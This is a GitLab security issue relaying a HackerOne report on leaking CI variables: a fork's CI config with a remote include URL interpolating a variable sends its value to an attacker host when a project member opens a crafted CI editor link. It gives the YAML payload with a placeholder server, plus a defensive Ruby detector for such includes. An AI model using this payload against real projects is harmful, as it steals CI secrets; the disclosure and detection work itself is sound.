Backend: Leaking CI variables by visiting the CI Editor via fork MRs

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1890451 by shells3c on 2023-03-02, assigned to GitLab Team:

Report

SSOT

Refer to #417275 (closed)

Summary

By clicking on a link, project members can leak CI variables of their project to hackers

Steps to reproduce
  1. [Victim account] Create a project, create a CI variable in General > CI/CD > Variables named xxx_variable
  2. [Attacker account] Fork the project, and edit the CI configuration (.gitlab-ci.yml by default) with the following content (replace <ATTACKER SERVER> with your server):

     ```yaml
     include:
       remote: 'http://<ATTACKER SERVER>/${xxx_variable}.yaml'
     ```

  3. [Attacker account] Create a merge request with the previous change, save the commit SHA
  4. [Victim account] Visit this link (with <sha> replaced) and the variable will be sent to the attacker server: https://gitlab.com/<user>/<project>/-/ci/editor?branch_name=<sha>

Output of checks

This bug happens on GitLab.com

Impact

Steal CI variables with one click

How To Reproduce

Please add reproducibility information to this section:

Proposal

Please read this thread: #394964 (comment 1416011415)
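
As an added defender-side check (not code from the report, the linked thread, or GitLab itself), the following Ruby scans a `.gitlab-ci.yml` for `include: remote:` URLs that reference CI variables, which is exactly the pattern the report abuses; the two configs are constructed samples and `attacker.example` is a placeholder host.

```ruby
require 'yaml'

# Common CI variable reference syntaxes: ${VAR}, $VAR and %VAR%
VARIABLE_REF = /\$\{[A-Za-z_][A-Za-z0-9_]*\}|\$[A-Za-z_][A-Za-z0-9_]*|%[A-Za-z_][A-Za-z0-9_]*%/

# Normalise the `include:` keyword into an array of hashes. GitLab accepts a
# bare string (shorthand for a local file), a single hash, or an array of either.
def include_entries(config)
  return [] unless config.is_a?(Hash)
  inc = config['include']
  return [] if inc.nil?
  list = inc.is_a?(Array) ? inc : [inc]
  list.map { |e| e.is_a?(String) ? { 'local' => e } : e }
end

# Return every `remote:` include whose URL contains a variable reference.
# When such a config is rendered with the project's CI variables, the
# variable values are substituted into the URL and sent to whoever runs
# that host, which is the leak described in this report.
def variable_interpolated_remote_includes(yaml_text)
  config = YAML.safe_load(yaml_text) || {}
  include_entries(config).filter_map do |entry|
    next unless entry.is_a?(Hash)
    url = entry['remote']
    next unless url.is_a?(String)
    refs = url.scan(VARIABLE_REF)
    next if refs.empty?
    { 'remote' => url, 'variables' => refs }
  end
end

# Constructed sample: the shape of the fork's CI config from the report.
MALICIOUS_CI = <<~YAML
  include:
    remote: 'http://attacker.example/${xxx_variable}.yaml'
YAML

# Constructed sample: ordinary includes with no variable references.
BENIGN_CI = <<~YAML
  include:
    - local: '/templates/build.yml'
    - remote: 'https://example.com/ci/common.yml'
YAML

if __FILE__ == $PROGRAM_NAME
  p variable_interpolated_remote_includes(MALICIOUS_CI)
  p variable_interpolated_remote_includes(BENIGN_CI)
end
```

Running the check against a fork's CI file before the editor resolves remote includes turns the report's one-click leak into a flagged entry instead of an outbound request.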

Edited Jul 07, 2023 by Mark Nuzzo